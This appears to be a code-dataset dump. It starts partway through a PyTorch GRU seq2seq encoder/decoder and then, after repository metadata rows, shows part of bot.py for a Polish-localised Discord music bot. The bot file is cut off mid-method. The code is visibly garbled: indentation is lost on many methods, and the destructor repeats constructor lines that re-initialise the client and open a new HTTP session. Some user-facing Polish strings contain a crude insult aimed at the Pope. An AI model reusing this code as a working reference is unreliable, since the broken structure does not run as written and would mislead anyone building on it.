        self.n_layers = seq2seq_params.encoder_layers
        self.embedding = embedding
        self.rnn = nn.GRU(
            input_size=self.cfg.embed_size,
            hidden_size=self.cfg.context_size,
            num_layers=self.n_layers,
        )

    def forward(self, word_idxs, hidden_state):
        """Encode a (message_len, batch) index tensor; return last output and last hidden layer."""
        time_major = (self.cfg.message_len, self.cfg.batch_size, self.cfg.embed_size)
        embedded = self.embedding(word_idxs).view(*time_major)
        outputs, hidden = self.rnn(embedded, hidden_state)
        return outputs[-1].unsqueeze(0), hidden[-1].unsqueeze(0)

    def init_hidden(self):
        """Zero-filled initial hidden state, moved to the GPU when configured."""
        zeros = torch.zeros(self.n_layers, self.cfg.batch_size, self.cfg.context_size)
        state = Variable(zeros)
        return state.cuda() if self.cfg.use_cuda else state
class GruDecoder(nn.Module):
    """Single-step GRU decoder over the shared embedding.

    Each forward() call consumes one token per batch row and returns a
    log-probability distribution over the vocabulary plus the new hidden state.
    """

    def __init__(self, seq2seq_params, embedding, n_layers, dropout_p=0.1):
        # type: (Seq2SeqConfig, nn.Embedding, int, float) -> None
        super(GruDecoder, self).__init__()
        self.cfg = seq2seq_params
        self.n_layers = n_layers
        self.dropout_p = dropout_p
        self.embedding = embedding
        # Dropout applied to the embedded input token(s).
        self.dropout = nn.Dropout(self.dropout_p)
        self.rnn = nn.GRU(
            input_size=self.cfg.embed_size,
            hidden_size=self.cfg.context_size,
            num_layers=self.n_layers,
            dropout=self.dropout_p,  # inter-layer dropout; a no-op unless n_layers > 1
        )
        # Projects the GRU output onto vocabulary logits.
        self.out = nn.Linear(self.cfg.context_size, self.cfg.vocab_size)

    def forward(self, word_idx_slice, last_hidden_state):
        """Processes a single slice of the minibatch - a single word per row.

        Returns (log-softmax of shape (batch_size, vocab_size), new hidden state).
        """
        embedded_words = self.embedding(word_idx_slice) \
            .view(1, self.cfg.batch_size, self.cfg.embed_size)
        post_dropout_words = self.dropout(embedded_words)
        output, hidden_state = self.rnn(post_dropout_words, last_hidden_state)
        # FIX: make the softmax dimension explicit — the implicit-dim form is
        # deprecated and warns; for this 2-D input the implicit dim was 1,
        # identical to -1, so results are unchanged.
        word_dist = F.log_softmax(self.out(output.squeeze(0)), dim=-1)
        return word_dist, hidden_state
|
[
"stuart@axelbrooke.com"
] |
stuart@axelbrooke.com
|
9c4146cf8d2c46ce68c4b555792e4dfbf0abee79
|
bb0fc24a46415c6780f734e4d7a6d9a8b203b02b
|
/musicbot/bot.py
|
49fe612d7542a775817784cf3f3f7dee10b9d6a2
|
[
"MIT"
] |
permissive
|
EZIO1337/papiezbotv6
|
b1880a1f4401737038c97499036e803def801496
|
dd93f8ca2d43a76517170bd4ea192524d66fb337
|
refs/heads/master
| 2021-05-16T14:41:37.671601
| 2018-01-22T23:25:26
| 2018-01-22T23:25:26
| 118,528,619
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 108,261
|
py
|
import os
import sys
import time
import shlex
import shutil
import random
import inspect
import logging
import asyncio
import pathlib
import traceback
import math
import re
import aiohttp
import discord
import colorlog
from io import BytesIO, StringIO
from functools import wraps
from textwrap import dedent
from datetime import timedelta
from collections import defaultdict
from discord.enums import ChannelType
from discord.ext.commands.bot import _get_variable
from . import exceptions
from . import downloader
from .playlist import Playlist
from .player import MusicPlayer
from .entry import StreamPlaylistEntry
from .opus_loader import load_opus_lib
from .config import Config, ConfigDefaults
from .permissions import Permissions, PermissionsDefaults
from .constructs import SkipState, Response, VoiceStateUpdate
from .utils import load_file, write_file, fixg, ftimedelta, _func_
from .constants import VERSION as BOTVERSION
from .constants import DISCORD_MSG_CHAR_LIMIT, AUDIO_CACHE_PATH
load_opus_lib()  # load the Opus codec library discord.py needs for voice audio

log = logging.getLogger(__name__)
class MusicBot(discord.Client):
    def __init__(self, config_file=None, perms_file=None):
        """Load config, permissions and playlists, then initialise the discord client."""
        try:
            # Set the terminal window title; fails harmlessly on some terminals.
            sys.stdout.write("\x1b]2;MusicBot {}\x07".format(BOTVERSION))
        except:
            pass

        if config_file is None:
            config_file = ConfigDefaults.options_file

        if perms_file is None:
            perms_file = PermissionsDefaults.perms_file

        self.players = {}            # server.id -> MusicPlayer
        self.exit_signal = None
        self.init_ok = False
        self.cached_app_info = None
        self.last_status = None

        self.config = Config(config_file)
        self.permissions = Permissions(perms_file, grant_all=[self.config.owner_id])

        self.blacklist = set(load_file(self.config.blacklist_file))
        self.autoplaylist = load_file(self.config.auto_playlist_file)
        # Working copy consumed song-by-song each autoplaylist cycle.
        self.autoplaylist_session = self.autoplaylist[:]

        self.aiolocks = defaultdict(asyncio.Lock)
        self.downloader = downloader.Downloader(download_folder='audio_cache')

        self._setup_logging()

        log.info(' MusicBot (version {}) '.format(BOTVERSION).center(50, '='))

        if not self.autoplaylist:
            log.warning("Autoplaylist is empty, disabling.")
            self.config.auto_playlist = False
        else:
            log.info("Loaded autoplaylist with {} entries".format(len(self.autoplaylist)))

        if self.blacklist:
            log.debug("Loaded blacklist with {} entries".format(len(self.blacklist)))

        # TODO: Do these properly
        # Per-server mutable state, lazily created with these defaults.
        ssd_defaults = {
            'last_np_msg': None,
            'auto_paused': False,
            'availability_paused': False
        }
        self.server_specific_data = defaultdict(ssd_defaults.copy)

        super().__init__()
        self.aiosession = aiohttp.ClientSession(loop=self.loop)
        self.http.user_agent += ' MusicBot/%s' % BOTVERSION
def __del__(self):
# These functions return futures but it doesn't matter
try: self.http.session.close()
except: pass
try: self.aiosession.close()
except: pass
super().__init__()
self.aiosession = aiohttp.ClientSession(loop=self.loop)
self.http.user_agent += ' MusicBot/%s' % BOTVERSION
    # TODO: Add some sort of `denied` argument for a message to send when someone else tries to use it
    def owner_only(func):
        """Decorator restricting a command coroutine to the configured owner id."""
        @wraps(func)
        async def wrapper(self, *args, **kwargs):
            # Only allow the owner to use these commands
            orig_msg = _get_variable('message')  # pulled from the caller's frame

            if not orig_msg or orig_msg.author.id == self.config.owner_id:
                # noinspection PyCallingNonCallable
                return await func(self, *args, **kwargs)
            else:
                raise exceptions.PermissionsError("only the owner can use this command", expire_in=30)

        return wrapper
    def dev_only(func):
        """Decorator restricting a command coroutine to the configured dev user ids."""
        @wraps(func)
        async def wrapper(self, *args, **kwargs):
            orig_msg = _get_variable('message')

            if orig_msg.author.id in self.config.dev_ids:
                # noinspection PyCallingNonCallable
                return await func(self, *args, **kwargs)
            else:
                raise exceptions.PermissionsError("only dev users can use this command", expire_in=30)

        wrapper.dev_cmd = True  # marker used elsewhere to identify dev commands
        return wrapper
    def ensure_appinfo(func):
        """Decorator that ensures the cached application info exists before running *func*."""
        @wraps(func)
        async def wrapper(self, *args, **kwargs):
            await self._cache_app_info()
            # noinspection PyCallingNonCallable
            return await func(self, *args, **kwargs)

        return wrapper
def _get_owner(self, *, server=None, voice=False):
return discord.utils.find(
lambda m: m.id == self.config.owner_id and (m.voice_channel if voice else True),
server.members if server else self.get_all_members()
)
def _delete_old_audiocache(self, path=AUDIO_CACHE_PATH):
try:
shutil.rmtree(path)
return True
except:
try:
os.rename(path, path + '__')
except:
return False
try:
shutil.rmtree(path)
except:
os.rename(path + '__', path)
return False
return True
    def _setup_logging(self):
        """Install the coloured console handler (and discord.py debug file log) exactly once."""
        if len(logging.getLogger(__package__).handlers) > 1:
            log.debug("Skipping logger setup, already set up")
            return

        shandler = logging.StreamHandler(stream=sys.stdout)
        shandler.setFormatter(colorlog.LevelFormatter(
            fmt = {
                'DEBUG': '{log_color}[{levelname}:{module}] {message}',
                'INFO': '{log_color}{message}',
                'WARNING': '{log_color}{levelname}: {message}',
                'ERROR': '{log_color}[{levelname}:{module}] {message}',
                'CRITICAL': '{log_color}[{levelname}:{module}] {message}',

                # Custom levels registered elsewhere in the package.
                'EVERYTHING': '{log_color}[{levelname}:{module}] {message}',
                'NOISY': '{log_color}[{levelname}:{module}] {message}',
                'VOICEDEBUG': '{log_color}[{levelname}:{module}][{relativeCreated:.9f}] {message}',
                'FFMPEG': '{log_color}[{levelname}:{module}][{relativeCreated:.9f}] {message}'
            },
            log_colors = {
                'DEBUG': 'cyan',
                'INFO': 'white',
                'WARNING': 'yellow',
                'ERROR': 'red',
                'CRITICAL': 'bold_red',

                'EVERYTHING': 'white',
                'NOISY': 'white',
                'FFMPEG': 'bold_purple',
                'VOICEDEBUG': 'purple',
            },
            style = '{',
            datefmt = ''
        ))
        shandler.setLevel(self.config.debug_level)
        logging.getLogger(__package__).addHandler(shandler)

        log.debug("Set logging level to {}".format(self.config.debug_level_str))

        if self.config.debug_mode:
            # Mirror discord.py's own DEBUG output to a file.
            dlogger = logging.getLogger('discord')
            dlogger.setLevel(logging.DEBUG)
            dhandler = logging.FileHandler(filename='logs/discord.log', encoding='utf-8', mode='w')
            dhandler.setFormatter(logging.Formatter('{asctime}:{levelname}:{name}: {message}', style='{'))
            dlogger.addHandler(dhandler)
@staticmethod
def _check_if_empty(vchannel: discord.Channel, *, excluding_me=True, excluding_deaf=False):
def check(member):
if excluding_me and member == vchannel.server.me:
return False
if excluding_deaf and any([member.deaf, member.self_deaf]):
return False
return True
return not sum(1 for m in vchannel.voice_members if check(m))
    async def _join_startup_channels(self, channels, *, autosummon=True):
        """Join one voice channel per server at startup.

        Preference per server: explicitly configured channel, then the channel
        the bot was already in (resume), then the owner's current channel when
        *autosummon* is enabled.
        """
        joined_servers = set()
        channel_map = {c.server: c for c in channels}

        def _autopause(player):
            # Pause right away when joining an empty channel.
            if self._check_if_empty(player.voice_client.channel):
                log.info("Initial autopause in empty channel")

                player.pause()
                self.server_specific_data[player.voice_client.channel.server]['auto_paused'] = True

        for server in self.servers:
            if server.unavailable or server in channel_map:
                continue

            if server.me.voice_channel:
                log.info("Found resumable voice channel {0.server.name}/{0.name}".format(server.me.voice_channel))
                channel_map[server] = server.me.voice_channel

            if autosummon:
                owner = self._get_owner(server=server, voice=True)
                if owner:
                    log.info("Found owner in \"{}\"".format(owner.voice_channel.name))
                    channel_map[server] = owner.voice_channel

        for server, channel in channel_map.items():
            if server in joined_servers:
                log.info("Already joined a channel in \"{}\", skipping".format(server.name))
                continue

            if channel and channel.type == discord.ChannelType.voice:
                log.info("Attempting to join {0.server.name}/{0.name}".format(channel))

                chperms = channel.permissions_for(server.me)

                if not chperms.connect:
                    log.info("Cannot join channel \"{}\", no permission.".format(channel.name))
                    continue

                elif not chperms.speak:
                    log.info("Will not join channel \"{}\", no permission to speak.".format(channel.name))
                    continue

                try:
                    player = await self.get_player(channel, create=True, deserialize=self.config.persistent_queue)
                    joined_servers.add(server)

                    log.info("Joined {0.server.name}/{0.name}".format(channel))

                    if player.is_stopped:
                        player.play()

                    if self.config.auto_playlist and not player.playlist.entries:
                        await self.on_player_finished_playing(player)

                    if self.config.auto_pause:
                        player.once('play', lambda player, **_: _autopause(player))

                except Exception:
                    log.debug("Error joining {0.server.name}/{0.name}".format(channel), exc_info=True)
                    log.error("Failed to join {0.server.name}/{0.name}".format(channel))

            elif channel:
                log.warning("Not joining {0.server.name}/{0.name}, that's a text channel.".format(channel))

            else:
                log.warning("Invalid channel thing: {}".format(channel))
    async def _wait_delete_msg(self, message, after):
        """Delete *message* once *after* seconds have elapsed."""
        await asyncio.sleep(after)
        await self.safe_delete_message(message, quiet=True)
    # TODO: Check to see if I can just move this to on_message after the response check
    async def _manual_delete_check(self, message, *, quiet=False):
        """Delete the invoking message when the config asks for it."""
        if self.config.delete_invoking:
            await self.safe_delete_message(message, quiet=quiet)
async def _check_ignore_non_voice(self, msg):
vc = msg.server.me.voice_channel
# If we've connected to a voice chat and we're in the same voice channel
if not vc or vc == msg.author.voice_channel:
return True
else:
raise exceptions.PermissionsError(
"you cannot use this command when not in the voice channel (%s)" % vc.name, expire_in=30)
    async def _cache_app_info(self, *, update=False):
        """Fetch and memoise ``application_info()`` for bot accounts.

        NOTE(review): with ``update=True`` the condition below (`not update`)
        still skips the fetch, so the cache is never actually refreshed —
        confirm whether the flag was meant to force a re-fetch.
        """
        if not self.cached_app_info and not update and self.user.bot:
            log.debug("Caching app info")
            self.cached_app_info = await self.application_info()

        return self.cached_app_info
    async def remove_from_autoplaylist(self, song_url:str, *, ex:Exception=None, delete_from_ap=False):
        """Drop *song_url* from the in-memory autoplaylist, logging it (and the
        reason *ex*) to the 'removed' file; optionally rewrite the playlist file."""
        if song_url not in self.autoplaylist:
            log.debug("URL \"{}\" not in autoplaylist, ignoring".format(song_url))
            return

        async with self.aiolocks[_func_()]:
            self.autoplaylist.remove(song_url)
            log.info("Removing unplayable song from autoplaylist: %s" % song_url)

            with open(self.config.auto_playlist_removed_file, 'a', encoding='utf8') as f:
                f.write(
                    '# Entry removed {ctime}\n'
                    '# Reason: {ex}\n'
                    '{url}\n\n{sep}\n\n'.format(
                        ctime=time.ctime(),
                        ex=str(ex).replace('\n', '\n#' + ' ' * 10), # 10 spaces to line up with # Reason:
                        url=song_url,
                        sep='#' * 32
                ))

            if delete_from_ap:
                log.info("Updating autoplaylist")
                write_file(self.config.auto_playlist_file, self.autoplaylist)
    @ensure_appinfo
    async def generate_invite_link(self, *, permissions=discord.Permissions(70380544), server=None):
        """Build an OAuth2 invite URL for this bot with the given permission bits."""
        return discord.utils.oauth_url(self.cached_app_info.id, permissions=permissions, server=server)
    async def join_voice_channel(self, channel):
        """Low-level voice connect that performs the gateway voice handshake itself.

        Reimplements discord.Client.join_voice_channel with explicit 15s
        timeouts on each handshake step plus voicedebug logging.
        """
        if isinstance(channel, discord.Object):
            channel = self.get_channel(channel.id)

        if getattr(channel, 'type', ChannelType.text) != ChannelType.voice:
            raise discord.InvalidArgument('Channel passed must be a voice channel')

        server = channel.server

        if self.is_voice_connected(server):
            raise discord.ClientException('Already connected to a voice channel in this server')

        def session_id_found(data):
            user_id = data.get('user_id')
            guild_id = data.get('guild_id')
            return user_id == self.user.id and guild_id == server.id

        log.voicedebug("(%s) creating futures", _func_())
        # register the futures for waiting
        session_id_future = self.ws.wait_for('VOICE_STATE_UPDATE', session_id_found)
        voice_data_future = self.ws.wait_for('VOICE_SERVER_UPDATE', lambda d: d.get('guild_id') == server.id)

        # "join" the voice channel
        log.voicedebug("(%s) setting voice state", _func_())
        await self.ws.voice_state(server.id, channel.id)

        log.voicedebug("(%s) waiting for session id", _func_())
        session_id_data = await asyncio.wait_for(session_id_future, timeout=15, loop=self.loop)

        # sometimes it gets stuck on this step. Jake said to wait indefinitely. To hell with that.
        log.voicedebug("(%s) waiting for voice data", _func_())
        data = await asyncio.wait_for(voice_data_future, timeout=15, loop=self.loop)

        kwargs = {
            'user': self.user,
            'channel': channel,
            'data': data,
            'loop': self.loop,
            'session_id': session_id_data.get('session_id'),
            'main_ws': self.ws
        }

        voice = discord.VoiceClient(**kwargs)
        try:
            log.voicedebug("(%s) connecting...", _func_())
            with aiohttp.Timeout(15):
                await voice.connect()

        except asyncio.TimeoutError as e:
            # Undo the half-open connection before propagating.
            log.voicedebug("(%s) connection failed, disconnecting", _func_())
            try:
                await voice.disconnect()
            except:
                pass
            raise e

        log.voicedebug("(%s) connection successful", _func_())

        self.connection._add_voice_client(server.id, voice)
        return voice
    async def get_voice_client(self, channel: discord.Channel):
        """Return the server's voice client, connecting (with up to 5 retries) if needed.

        Restarts the bot when no connection can be made at all.
        """
        if isinstance(channel, discord.Object):
            channel = self.get_channel(channel.id)

        if getattr(channel, 'type', ChannelType.text) != ChannelType.voice:
            raise AttributeError('Channel passed must be a voice channel')

        async with self.aiolocks[_func_() + ':' + channel.server.id]:
            if self.is_voice_connected(channel.server):
                return self.voice_client_in(channel.server)

            vc = None
            t0 = t1 = 0
            tries = 5

            for attempt in range(1, tries+1):
                log.debug("Connection attempt {} to {}".format(attempt, channel.name))
                t0 = time.time()

                try:
                    vc = await self.join_voice_channel(channel)
                    t1 = time.time()
                    break

                except asyncio.TimeoutError:
                    log.warning("Failed to connect, retrying ({}/{})".format(attempt, tries))

                    # TODO: figure out if I need this or not
                    # try:
                    #     await self.ws.voice_state(channel.server.id, None)
                    # except:
                    #     pass

                except:
                    log.exception("Unknown error attempting to connect to voice")

                await asyncio.sleep(0.5)

            if not vc:
                log.critical("Voice client is unable to connect, restarting...")
                await self.restart()

            log.debug("Connected in {:0.1f}s".format(t1-t0))
            log.info("Connected to {}/{}".format(channel.server, channel))

            vc.ws._keep_alive.name = 'VoiceClient Keepalive'

            return vc
    async def reconnect_voice_client(self, server, *, sleep=0.1, channel=None):
        """Tear down and re-establish the server's voice connection.

        Pauses/resumes the player across the reconnect; a non-None *channel*
        moves the bot to that voice channel instead of the current one.
        """
        log.debug("Reconnecting voice client on \"{}\"{}".format(
            server, ' to "{}"'.format(channel.name) if channel else ''))

        async with self.aiolocks[_func_() + ':' + server.id]:
            vc = self.voice_client_in(server)

            if not (vc or channel):
                return

            _paused = False
            player = self.get_player_in(server)

            if player and player.is_playing:
                log.voicedebug("(%s) Pausing", _func_())

                player.pause()
                _paused = True

            log.voicedebug("(%s) Disconnecting", _func_())
            # NOTE(review): when called with only *channel* (no existing vc),
            # `vc` is None here; the AttributeError is swallowed by this except.
            try:
                await vc.disconnect()
            except:
                pass

            if sleep:
                log.voicedebug("(%s) Sleeping for %s", _func_(), sleep)
                await asyncio.sleep(sleep)

            if player:
                log.voicedebug("(%s) Getting voice client", _func_())

                if not channel:
                    new_vc = await self.get_voice_client(vc.channel)
                else:
                    new_vc = await self.get_voice_client(channel)

                log.voicedebug("(%s) Swapping voice client", _func_())
                await player.reload_voice(new_vc)

                if player.is_paused and _paused:
                    log.voicedebug("Resuming")
                    player.resume()

        log.debug("Reconnected voice client on \"{}\"{}".format(
            server, ' to "{}"'.format(channel.name) if channel else ''))
async def disconnect_voice_client(self, server):
vc = self.voice_client_in(server)
if not vc:
return
if server.id in self.players:
self.players.pop(server.id).kill()
await vc.disconnect()
async def disconnect_all_voice_clients(self):
for vc in list(self.voice_clients).copy():
await self.disconnect_voice_client(vc.channel.server)
    async def set_voice_state(self, vchannel, *, mute=False, deaf=False):
        """Send a raw gateway voice-state update (mute/deaf flags) for *vchannel*."""
        if isinstance(vchannel, discord.Object):
            vchannel = self.get_channel(vchannel.id)

        if getattr(vchannel, 'type', ChannelType.text) != ChannelType.voice:
            raise AttributeError('Channel passed must be a voice channel')

        await self.ws.voice_state(vchannel.server.id, vchannel.id, mute, deaf)
        # I hope I don't have to set the channel here
        # instead of waiting for the event to update it
    def get_player_in(self, server: discord.Server) -> MusicPlayer:
        """Return the server's MusicPlayer, or None when it has none."""
        return self.players.get(server.id)
    async def get_player(self, channel, create=False, *, deserialize=False) -> MusicPlayer:
        """Return (or create) the MusicPlayer for *channel*'s server.

        With *deserialize* True, first tries restoring a persisted queue.
        Raises CommandError when no player exists and *create* is False.
        """
        server = channel.server

        async with self.aiolocks[_func_() + ':' + server.id]:
            if deserialize:
                voice_client = await self.get_voice_client(channel)
                player = await self.deserialize_queue(server, voice_client)

                if player:
                    log.debug("Created player via deserialization for server %s with %s entries", server.id, len(player.playlist))
                    # Since deserializing only happens when the bot starts, I should never need to reconnect
                    return self._init_player(player, server=server)

            if server.id not in self.players:
                if not create:
                    raise exceptions.CommandError(
                        'Papież nie jest na kanale głosowym.. '
                        'Zawołaj pedofila używając %sdj aby wezwać najlepszego Didżeja w Watykanie!' % self.config.command_prefix)

                voice_client = await self.get_voice_client(channel)

                playlist = Playlist(self)
                player = MusicPlayer(self, voice_client, playlist)
                self._init_player(player, server=server)

            # Reconnect when the stored voice client has gone stale.
            async with self.aiolocks[self.reconnect_voice_client.__name__ + ':' + server.id]:
                if self.players[server.id].voice_client not in self.voice_clients:
                    log.debug("Reconnect required for voice client in {}".format(server.name))
                    await self.reconnect_voice_client(server, channel=channel)

            return self.players[server.id]
    def _init_player(self, player, *, server=None):
        """Attach event handlers to a MusicPlayer and register it for *server*.

        NOTE(review): several event names here are Polish ('graj', 'odpauzuj',
        'pauza') while others remain English — confirm they match the names the
        MusicPlayer actually emits, otherwise those handlers never fire.
        """
        player = player.on('graj', self.on_player_play) \
                       .on('odpauzuj', self.on_player_resume) \
                       .on('pauza', self.on_player_pause) \
                       .on('stop', self.on_player_stop) \
                       .on('finished-playing', self.on_player_finished_playing) \
                       .on('entry-added', self.on_player_entry_added) \
                       .on('error', self.on_player_error)

        player.skip_state = SkipState()

        if server:
            self.players[server.id] = player

        return player
    async def on_player_play(self, player, entry):
        """Player 'play' handler: update presence and post/refresh the now-playing message."""
        await self.update_now_playing_status(entry)
        player.skip_state.reset()

        # This is the one event where its ok to serialize autoplaylist entries
        await self.serialize_queue(player.voice_client.channel.server)

        channel = entry.meta.get('kanał', None)
        author = entry.meta.get('autor', None)

        # Only user-queued entries (with channel+author meta) get a chat message.
        if channel and author:
            last_np_msg = self.server_specific_data[channel.server]['last_np_msg']
            if last_np_msg and last_np_msg.channel == channel:

                # Delete the old now-playing message if it's no longer the latest in the channel.
                async for lmsg in self.logs_from(channel, limit=1):
                    if lmsg != last_np_msg and last_np_msg:
                        await self.safe_delete_message(last_np_msg)
                        self.server_specific_data[channel.server]['last_np_msg'] = None
                    break  # This is probably redundant

            if self.config.now_playing_mentions:
                newmsg = '%s - twoja piosenka **%s** jest grana na kanale %s!' % (
                    entry.meta['autor'].mention, entry.title, player.voice_client.channel.name)
            else:
                newmsg = 'Napierdalamy na %s: **%s**' % (
                    player.voice_client.channel.name, entry.title)

            if self.server_specific_data[channel.server]['last_np_msg']:
                self.server_specific_data[channel.server]['last_np_msg'] = await self.safe_edit_message(last_np_msg, newmsg, send_if_fail=True)
            else:
                self.server_specific_data[channel.server]['last_np_msg'] = await self.safe_send_message(channel, newmsg)
    # TODO: Check channel voice state?
    async def on_player_resume(self, player, entry, **_):
        """Player 'resume' handler: restore the now-playing presence text."""
        await self.update_now_playing_status(entry)
    async def on_player_pause(self, player, entry, **_):
        """Player 'pause' handler: show the paused marker in the presence text."""
        await self.update_now_playing_status(entry, True)
        # await self.serialize_queue(player.voice_client.channel.server)
    async def on_player_stop(self, player, **_):
        """Player 'stop' handler: clear the now-playing presence."""
        await self.update_now_playing_status()
async def on_player_finished_playing(self, player, **_):
if not player.playlist.entries and not player.current_entry and self.config.auto_playlist:
if not self.autoplaylist_session:
log.info("Autoplaylista pusta,napierdalam własną....")
self.autoplaylist_session = self.autoplaylist[:]
while self.autoplaylist_session:
random.shuffle(self.autoplaylist_session)
song_url = random.choice(self.autoplaylist_session)
self.autoplaylist_session.remove(song_url)
info = {}
try:
info = await self.downloader.extract_info(player.playlist.loop, song_url, download=False, process=False)
except downloader.youtube_dl.utils.DownloadError as e:
if 'Youtube powiedział:' in e.args[0]:
# url is bork, remove from list and put in removed list
log.error("Błąd na youtube url:\n{}".format(e.args[0]))
else:
# Probably an error from a different extractor, but I've only seen youtube's
log.error("Błąd \"{url}\": {ex}".format(url=song_url, ex=e))
await self.remove_from_autoplaylist(song_url, ex=e, delete_from_ap=True)
continue
except Exception as e:
log.error("Błąd \"{url}\": {ex}".format(url=song_url, ex=e))
log.exception()
self.autoplaylist.remove(song_url)
continue
if info.get('entries', None): # or .get('_type', '') == 'playlist'
log.debug("Ta playlista jest nie fajna,przewijam.")
# TODO: Playlist expansion
# Do I check the initial conditions again?
# not (not player.playlist.entries and not player.current_entry and self.config.auto_playlist)
try:
await player.playlist.add_entry(song_url, channel=None, author=None)
except exceptions.ExtractionError as e:
log.error("Błąd w trakcie przesyłania nutki z autoplaylisty: {}".format(e))
log.debug('', exc_info=True)
continue
break
if not self.autoplaylist:
# TODO: When I add playlist expansion, make sure that's not happening during this check
log.warning("Wyłączam autoplayliste.")
self.config.auto_playlist = False
else: # Don't serialize for autoplaylist events
await self.serialize_queue(player.voice_client.channel.server)
    async def on_player_entry_added(self, player, playlist, entry, **_):
        """Persist the queue when a user-submitted entry (with author+channel meta) is added."""
        if entry.meta.get('autor') and entry.meta.get('kanał'):
            await self.serialize_queue(player.voice_client.channel.server)
async def on_player_error(self, player, entry, ex, **_):
if 'kanał' in entry.meta:
await self.safe_send_message(
entry.meta['kanał'],
"```\nError from FFmpeg:\n{}\n```".format(ex)
)
else:
log.exception("Player error", exc_info=ex)
    async def update_now_playing_status(self, entry=None, is_paused=False):
        """Refresh the bot's Discord presence ("Playing ...") text.

        A configured static status_message always wins. Otherwise the status
        reflects the current entry, or a server count when several players
        are active at once.

        :param entry: optional playlist entry to display; auto-detected when
            exactly one player is playing.
        :param is_paused: prefix the title with a pause glyph when True.
        """
        game = None
        if not self.config.status_message:
            if self.user.bot:
                activeplayers = sum(1 for p in self.players.values() if p.is_playing)
                if activeplayers > 1:
                    game = discord.Game(type=0, name="music on %s servers" % activeplayers)
                    entry = None
                elif activeplayers == 1:
                    player = discord.utils.get(self.players.values(), is_playing=True)
                    entry = player.current_entry
            if entry:
                # \u275A\u275A renders as a double-bar "paused" glyph.
                prefix = u'\u275A\u275A ' if is_paused else ''
                name = u'{}{}'.format(prefix, entry.title)[:128]  # presence name length cap
                game = discord.Game(type=0, name=name)
        else:
            game = discord.Game(type=0, name=self.config.status_message.strip()[:128])
        # Serialize presence updates and only hit the API on actual change.
        async with self.aiolocks[_func_()]:
            if game != self.last_status:
                await self.change_presence(game=game)
                self.last_status = game
    async def update_now_playing_message(self, server, message, *, channel=None):
        """Post or update the per-server "now playing" message.

        Passing message=None deletes the previous now-playing message (if any).
        The last message sent (or None) is remembered in server_specific_data.
        """
        lnp = self.server_specific_data[server]['last_np_msg']
        m = None
        if message is None and lnp:
            await self.safe_delete_message(lnp, quiet=True)
        elif lnp:  # If there was a previous lp message
            oldchannel = lnp.channel
            # NOTE(review): this condition is always true (oldchannel was just
            # assigned from lnp.channel), so the elif/else branches below are
            # currently unreachable -- confirm the intended check (probably
            # `if channel:`) before relying on the fallback behavior.
            if lnp.channel == oldchannel:  # If we have a channel to update it in
                # Only edit in place if our message is still the latest one in
                # the channel; otherwise delete and resend so it stays visible.
                async for lmsg in self.logs_from(channel, limit=1):
                    if lmsg != lnp and lnp:  # If we need to resend it
                        await self.safe_delete_message(lnp, quiet=True)
                        m = await self.safe_send_message(channel, message, quiet=True)
                    else:
                        m = await self.safe_edit_message(lnp, message, send_if_fail=True, quiet=False)
            elif channel:  # If we have a new channel to send it to
                await self.safe_delete_message(lnp, quiet=True)
                m = await self.safe_send_message(channel, message, quiet=True)
            else:  # we just resend it in the old channel
                await self.safe_delete_message(lnp, quiet=True)
                m = await self.safe_send_message(oldchannel, message, quiet=True)
        elif channel:  # No previous message
            m = await self.safe_send_message(channel, message, quiet=True)
        self.server_specific_data[server]['last_np_msg'] = m
async def serialize_queue(self, server, *, dir=None):
"""
Serialize the current queue for a server's player to json.
"""
player = self.get_player_in(server)
if not player:
return
if dir is None:
dir = 'data/%s/queue.json' % server.id
async with self.aiolocks['queue_serialization'+':'+server.id]:
log.debug("Serializing queue for %s", server.id)
with open(dir, 'w', encoding='utf8') as f:
f.write(player.serialize(sort_keys=True))
async def serialize_all_queues(self, *, dir=None):
coros = [self.serialize_queue(s, dir=dir) for s in self.servers]
await asyncio.gather(*coros, return_exceptions=True)
async def deserialize_queue(self, server, voice_client, playlist=None, *, dir=None) -> MusicPlayer:
"""
Deserialize a saved queue for a server into a MusicPlayer. If no queue is saved, returns None.
"""
if playlist is None:
playlist = Playlist(self)
if dir is None:
dir = 'data/%s/queue.json' % server.id
async with self.aiolocks['queue_serialization' + ':' + server.id]:
if not os.path.isfile(dir):
return None
log.debug("Deserializing queue for %s", server.id)
with open(dir, 'r', encoding='utf8') as f:
data = f.read()
return MusicPlayer.from_json(data, self, voice_client, playlist)
    @ensure_appinfo
    async def _on_ready_sanity_checks(self):
        """Run all startup sanity checks (env folders, permissions,
        autoplaylist, config validation) in order."""
        # Ensure folders exist
        await self._scheck_ensure_env()
        # Server permissions check
        await self._scheck_server_permissions()
        # playlists in autoplaylist
        await self._scheck_autoplaylist()
        # config/permissions async validate?
        await self._scheck_configs()
async def _scheck_ensure_env(self):
log.debug("Ensuring data folders exist")
for server in self.servers:
pathlib.Path('data/%s/' % server.id).mkdir(exist_ok=True)
with open('data/server_names.txt', 'w', encoding='utf8') as f:
for server in sorted(self.servers, key=lambda s:int(s.id)):
f.write('{:<22} {}\n'.format(server.id, server.name))
if not self.config.save_videos and os.path.isdir(AUDIO_CACHE_PATH):
if self._delete_old_audiocache():
log.debug("Deleted old audio cache")
else:
log.debug("Could not delete old audio cache, moving on.")
    async def _scheck_server_permissions(self):
        """Placeholder: audit per-server permissions at startup (not implemented)."""
        log.debug("Checking server permissions")
        pass # TODO
    async def _scheck_autoplaylist(self):
        """Placeholder: validate autoplaylist entries at startup (not implemented)."""
        log.debug("Auditing autoplaylist")
        pass # TODO
    async def _scheck_configs(self):
        """Run async validation on the config and permissions objects."""
        log.debug("Validating config")
        await self.config.async_validate(self)
        log.debug("Validating permissions config")
        await self.permissions.async_validate(self)
#######################################################################################################################
    async def safe_send_message(self, dest, content, **kwargs):
        """Send a message, downgrading Discord API failures to log output.

        Keyword options:
            tts: send as text-to-speech.
            quiet: log failures at debug instead of warning level.
            expire_in: seconds after which the sent message is deleted (0 = keep).
            allow_none: permit the send call even when content is None.
            also_delete: another Message to delete on the same expire timer.

        Returns the sent Message, or None when sending failed or was skipped.
        """
        tts = kwargs.pop('tts', False)
        quiet = kwargs.pop('quiet', False)
        expire_in = kwargs.pop('expire_in', 0)
        allow_none = kwargs.pop('allow_none', True)
        also_delete = kwargs.pop('also_delete', None)
        msg = None
        lfunc = log.debug if quiet else log.warning
        try:
            if content is not None or allow_none:
                msg = await self.send_message(dest, content, tts=tts)
        except discord.Forbidden:
            lfunc("Cannot send message to \"%s\", no permission", dest.name)
        except discord.NotFound:
            lfunc("Cannot send message to \"%s\", invalid channel?", dest.name)
